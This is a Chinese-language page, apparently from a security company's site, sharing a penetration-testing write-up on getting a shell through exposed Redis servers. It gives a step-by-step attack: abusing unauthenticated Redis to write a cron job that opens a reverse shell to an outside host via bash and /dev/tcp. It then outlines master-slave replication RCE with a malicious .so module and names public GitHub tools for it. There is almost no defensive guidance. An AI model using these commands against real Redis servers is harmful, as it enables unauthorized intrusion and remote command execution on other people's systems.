网络安全工具团结互助，让我们共同进步！

当前位置：主页 > 技术资讯 > 工具 > 网络安全工具 >

我们的优势： 10年相关行业经验，专业设计师量身定制设计师一对一服务模式，上百家客户案例！企业保证，正规流程，正规合作 7*24小时在线服务，售后无忧

渗透测试经验分享:Redis+Getshell

文章来源：重庆网络安全围观次数：

分享到:

摘要：redis是一个Key-Value类型数据库。所有redis数据都在内存中操作，并且可以将内存中的数据定期存储到磁盘，并支持保存多个数据结构（String、hash、list）。

简单来说，redis是一个Key-Value类型数据库。所有redis数据都在内存中操作，并且可以将内存中的数据定期存储到磁盘，并支持保存多个数据结构（String、hash、list）。

1.未经授权的访问漏洞

默认情况下，Redis绑定到0.0.0.0:6379。如果没有受限的IP访问，则Redis服务将在公共网络上公开，并且如果未设置密码身份验证，它将导致任何用户的未经授权的访问。 Redis和读取Redis数据并写入用于远程连接的公共密钥。

获得数据库权限，但我们的目标只有一个，getshell！

当前，有两种主流方法，一种是定时计划反弹shell，第二种是使用主从复制rce。

2.安排反弹shell

1）set x “\n* * * * * bash -i >& /dev/tcp/1.1.1.1/888 0>&1\n”

2）config set dir /var/spool/cron/

3）config set dbfilename root

4）save

3.使用主从复制RCE

该漏洞存在于4.x和5.x版本中。 Redis提供了主从模式。主从模式是指将一个Redis用作主机，将另一个Redis用作备份机。主站和从站的数据相同。主机仅负责写。在Reids 4.x之后，通过外部扩展，可以在redis中实现新的Redis命令以构造恶意的.so文件。当两个Redis实例设置为主从模式时，Redis主实例可以通过FULLRESYNC将文件同步到从属。然后将恶意的so文件加载到从服务器上并执行命令。

需要使用工具，在GitHub上下载。

1）git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand（需要make）

2）git clone https://github.com/Ridter/redis-rce.git

然后通过未经授权的访问或弱密码连接到Redis，并执行脚本以获取Shell。